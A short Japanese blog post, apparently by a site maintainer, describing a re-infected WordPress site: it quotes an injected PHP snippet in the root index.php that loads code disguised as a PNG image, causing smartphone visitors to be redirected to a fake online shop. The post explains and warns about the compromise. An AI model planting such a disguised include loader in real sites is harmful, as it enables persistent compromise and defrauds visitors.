wordpress直下のindex.phpに以下のようなコードが！？

（テンプレートでなく直下です）

<?php
//installbg
$rifilename=’/var/www/vhosts/hogehoge.com/httpdocs/wp-includes/images/media/logo_s.png’;
require(“$rifilename”);
//installend

なんと画像に偽装されたコードが実行されているという。

実は、2か月ほど前、サイト改ざん修正の依頼があって、当時取り切れていなかったファイルがあり、そこから再度改ざんされたようです。

スマホからのみ偽通販サイトに飛ばされてしまします。困ったもんだ。